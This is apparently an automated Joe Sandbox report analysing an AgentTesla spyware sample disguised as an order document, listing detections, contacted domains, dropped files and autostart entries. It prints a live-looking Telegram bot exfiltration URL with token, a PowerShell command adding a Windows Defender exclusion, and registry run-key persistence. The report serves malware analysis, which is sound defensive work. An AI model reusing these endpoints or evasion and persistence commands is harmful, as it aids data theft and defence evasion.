                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Users1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553020 Sample: #NEW ORDER FOR JANUARY 2022.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 54 192.168.2.1 unknown unknown 2->54 56 api.telegram.org 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 Yara detected UAC Bypass using CMSTP 2->60 62 Yara detected AgentTesla 2->62 64 15 other signatures 2->64 8 #NEW ORDER FOR JANUARY 2022.exe 5 6 2->8         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 50 C:\Windows\Microsoft.NET\...\svchost.exe, PE32 8->50 dropped 52 C:\...\#NEW ORDER FOR JANUARY 2022.exe.log, ASCII 8->52 dropped 70 Creates autostart registry keys with suspicious names 8->70 72 Creates an autostart registry key pointing to binary in C:\Windows 8->72 74 Writes to foreign memory regions 8->74 76 Adds a new user with administrator rights 8->76 18 net.exe 1 8->18         started        20 aspnet_regbrowsers.exe 8->20         started        23 net.exe 1 8->23         started        29 8 other processes 8->29 78 Multi AV Scanner detection for dropped file 12->78 80 Adds a directory exclusion to Windows Defender 12->80 82 Injects a PE file into a foreign processes 12->82 25 powershell.exe 12->25         started        27 aspnet_regbrowsers.exe 12->27         started        signatures6 process7 signatures8 31 net1.exe 1 18->31         started        34 conhost.exe 18->34         started        66 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->66 68 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 20->68 36 conhost.exe 23->36         started        38 net1.exe 1 23->38         started        40 conhost.exe 25->40         started        42 conhost.exe 29->42         started        44 conhost.exe 29->44         started        46 conhost.exe 29->46         started        48 6 other processes 29->48 process9 signatures10 84 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 31->84 86 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 31->86

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      #NEW ORDER FOR JANUARY 2022.exe19%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe19%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      37.2.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      31.0.aspnet_regbrowsers.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      31.2.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://YsLVkm.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://api.ipify.org%GETMozilla/5.0aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		low
                        http://DynDns.comDynDNSaspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://tempuri.org/#NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument-----aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                          		high
                          http://YsLVkm.comaspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haaspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmpfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipsvchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpfalse
                              		high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:553020
                              Start date:14.01.2022
                              Start time:05:31:36
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:#NEW ORDER FOR JANUARY 2022.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:61
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@71/19@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 0.4% (good quality ratio 0.4%)
                              • Quality average: 82.1%
                              • Quality standard deviation: 20%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 248
                              • Number of non-executed functions: 10
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
                              • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, t-ring.msedge.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              05:32:32API Interceptor309x Sleep call for process: powershell.exe modified
                              05:32:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:32:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HPQOEAM - f "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              05:33:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:12API Interceptor414x Sleep call for process: aspnet_regbrowsers.exe modified
                              05:33:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:50API Interceptor7x Sleep call for process: svchost.exe modified
                              05:34:22API Interceptor62x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.log
                              Process:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1488
                              Entropy (8bit):5.338732761611821
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5:608F72EADF7367FD731F4A9838E535BF
                              SHA1:831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256:EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512:E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious:true
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
                              Process:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1488
                              Entropy (8bit):5.338732761611821
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5:608F72EADF7367FD731F4A9838E535BF
                              SHA1:831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256:EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512:E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):22180
                              Entropy (8bit):5.382395220506782
                              Encrypted:false
                              SSDEEP:384:JtCDD3Q3zwbTnNrnVsI1kt04mRdvOOhhrmFdObLAPaC:83QKlntqpIOgrKlf
                              MD5:868B45F63CEA63255972AF887177602C
                              SHA1:E6150AD0AF99DCCA5BA47E38B3917E89C53C2645
                              SHA-256:9576CBC5A5B034E5324ACFD21D2E51F7DF0D25D5D8B730AF1DF88C523632F704
                              SHA-512:925387EDFDC65E27BB93F5648F187D903427636DA16D0C990580EED3156CAB19646A90DC6658EDF2537FEB7B130BBBE457920885A1FD60F3833423FF9AA34D8A
                              Malicious:false
                              Reputation:unknown
                              Preview: @...e...........a.......u.|.........v...@.Z..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rnex2ek.lje.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uypqtat.42m.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2nywgzx.vdr.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj0etfuz.zra.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knth15sn.2xz.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndedftbp.hio.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pswme1px.15w.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qim5i45f.hre.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrcvsx0a.z50.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.8tzwXQ58.20220114053231.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.380010783427229
                              Encrypted:false
                              SSDEEP:96:BZNj2NGqDo1Z7FZfj2NGqDo1ZFqjA0cA0cA0OZh:Tccl
                              MD5:460D1EEA3318EA76817C22353BA78DB0
                              SHA1:220756D03DCA9F8D651664218C71A6D2B227C591
                              SHA-256:E4B62F2EE756CD8C5C7489423AB8E58127CF473AE16E1C8253FDAD9CA61507B2
                              SHA-512:B004764F490524ED9C3B4FC7A8E9F7C3F4C84F237FE0CCC52A1F5E5D2AD5EAA6F25F42B9891135F6302EBEB43238991EC3D0E8B4823FD07226C67FFB29730B98
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053232..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 6684..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053232..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053450..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Cb2iz80h.20220114053303.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.416622514629973
                              Encrypted:false
                              SSDEEP:96:BZrj2NfPqDo1ZvGZQj2NfPqDo1Z1Ln9nznjZRj2NfPqDo1ZecnDnDnsrZCS:joS
                              MD5:6EB4BB056B4FD666EC578F830F7A24C1
                              SHA1:C948BD8B279111AB83F7EFE413F1AA094EF6EE76
                              SHA-256:6C8E95C381C59461EE046EEAF7E1397443A8B105C0E57925C8C3096579017309
